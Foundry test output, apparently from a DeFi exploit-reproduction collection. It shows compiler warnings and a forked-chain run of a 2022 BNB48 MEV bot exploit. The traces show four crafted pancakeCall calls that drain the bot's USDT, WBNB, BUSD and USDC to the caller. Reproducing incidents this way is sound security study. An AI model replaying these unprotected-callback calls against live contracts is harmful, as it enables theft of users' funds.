Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.16s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-09/BNB48MEVBot_exp.sol:13:5:
   |
13 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-09/BNB48MEVBot_exp.sol:14:5:
   |
14 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-09/BNB48MEVBot_exp.sol:16:5:
   |
16 |     IERC20 USDC = IERC20(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.73s (1.96ms CPU time)

Ran 1 test for src/test/2022-09/BNB48MEVBot_exp.sol:ContractTest
[PASS] testExploit() (gas: 266291)
Logs:
  [Start] Attacker USDT balance before exploit: 0.000000000000000000
  [Start] Attacker WBNB balance before exploit: 0.000000000000000000
  [Start] Attacker BUSD balance before exploit: 0.000000000000000000
  [Start] Attacker USDC balance before exploit: 0.000000000000000000
  [End] Attacker USDT balance after exploit: 25912.948173777791158265
  [End] Attacker WBNB balance after exploit: 327.931283327916980816
  [End] Attacker BUSD balance after exploit: 22307.554466878046228172
  [End] Attacker USDC balance after exploit: 5160.324984279773039298

Traces:
  [5801] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 21297409 [2.129e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [285491] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker USDT balance before exploit", val: 0, decimals: 18)
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker WBNB balance before exploit", val: 0, decimals: 18)
    ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker BUSD balance before exploit", val: 0, decimals: 18)
    ├─ [9796] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker USDC balance before exploit", val: 0, decimals: 18)
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d) [staticcall]
    │   └─ ← [Return] 25912948173777791158265 [2.591e22]
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d) [staticcall]
    │   └─ ← [Return] 327931283327916980816 [3.279e20]
    ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d) [staticcall]
    │   └─ ← [Return] 22307554466878046228172 [2.23e22]
    ├─ [3296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d) [staticcall]
    │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d) [delegatecall]
    │   │   └─ ← [Return] 5160324984279773039298 [5.16e21]
    │   └─ ← [Return] 5160324984279773039298 [5.16e21]
    ├─ [39092] 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 25912948173777791158265 [2.591e22], 0, 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [634] ContractTest::token0() [staticcall]
    │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   ├─ [25971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 25912948173777791158265 [2.591e22])
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 25912948173777791158265 [2.591e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x7d089b79e78767a5991c60b2ece090f7c3d4b60a7c3598e8aa910e2d28538bb7: 0x00000000000000000000000000000000000000000000057cbe656f5e0c7507f9 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000057cbe656f5e0c7507f9
    │   │   └─ ← [Return] true
    │   ├─ [1050] ContractTest::swap(0, 0, 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0x)
    │   │   └─ ← [Stop]
    │   ├─ [581] ContractTest::token1() [staticcall]
    │   │   └─ ← [Return] 0x55d398326f99059fF775485246999027B3197955
    │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0)
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, value: 0)
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [39065] 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 327931283327916980816 [3.279e20], 0, 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [634] ContractTest::token0() [staticcall]
    │   │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    │   ├─ [25962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 327931283327916980816 [3.279e20])
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 327931283327916980816 [3.279e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5cee03b0659ab31794c7229f8b4fb485479ea7436fe9c15ce28a3b9a4c624d42: 0x000000000000000000000000000000000000000000000011c6f5f4bb7a783a50 → 0
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000011c6f5f4bb7a783a50
    │   │   └─ ← [Return] true
    │   ├─ [1050] ContractTest::swap(0, 0, 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0x)
    │   │   └─ ← [Stop]
    │   ├─ [581] ContractTest::token1() [staticcall]
    │   │   └─ ← [Return] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
    │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0)
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, value: 0)
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [39092] 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 22307554466878046228172 [2.23e22], 0, 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [634] ContractTest::token0() [staticcall]
    │   │   └─ ← [Return] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56
    │   ├─ [25971] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 22307554466878046228172 [2.23e22])
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 22307554466878046228172 [2.23e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000004b94b81e522f8564ecc
    │   │   │   @ 0x7d089b79e78767a5991c60b2ece090f7c3d4b60a7c3598e8aa910e2d28538bb7: 0x0000000000000000000000000000000000000000000004b94b81e522f8564ecc → 0
    │   │   └─ ← [Return] true
    │   ├─ [1050] ContractTest::swap(0, 0, 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0x)
    │   │   └─ ← [Stop]
    │   ├─ [581] ContractTest::token1() [staticcall]
    │   │   └─ ← [Return] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56
    │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0)
    │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, value: 0)
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [41396] 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5160324984279773039298 [5.16e21], 0, 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
    │   ├─ [634] ContractTest::token0() [staticcall]
    │   │   └─ ← [Return] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d
    │   ├─ [26739] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5160324984279773039298 [5.16e21])
    │   │   ├─ [25993] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5160324984279773039298 [5.16e21]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5160324984279773039298 [5.16e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000117bde528a101154ac2
    │   │   │   │   @ 0x7d089b79e78767a5991c60b2ece090f7c3d4b60a7c3598e8aa910e2d28538bb7: 0x000000000000000000000000000000000000000000000117bde528a101154ac2 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [1050] ContractTest::swap(0, 0, 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0x)
    │   │   └─ ← [Stop]
    │   ├─ [581] ContractTest::token1() [staticcall]
    │   │   └─ ← [Return] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d
    │   ├─ [4039] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ [3293] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [4039] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::transfer(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0)
    │   │   ├─ [3293] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::transfer(0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, 0) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, to: 0x64dD59D6C7f09dc05B472ce5CB961b6E10106E1d, value: 0)
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 25912948173777791158265 [2.591e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 25912948173777791158265 [2.591e22], decimals: 18)
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 327931283327916980816 [3.279e20]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB balance after exploit", val: 327931283327916980816 [3.279e20], decimals: 18)
    ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 22307554466878046228172 [2.23e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BUSD balance after exploit", val: 22307554466878046228172 [2.23e22], decimals: 18)
    ├─ [1296] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 5160324984279773039298 [5.16e21]
    │   └─ ← [Return] 5160324984279773039298 [5.16e21]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC balance after exploit", val: 5160324984279773039298 [5.16e21], decimals: 18)
    ├─  storage changes:
    │   @ 31: 1 → 0x00000000000000000000008ac76a51cc950d9822d68b83fe1ad97b32cd580d01
    │   @ 32: 0 → 0x0000000000000000000000008ac76a51cc950d9822d68b83fe1ad97b32cd580d
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.81s (6.80s CPU time)

Ran 2 test suites in 8.83s (13.55s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
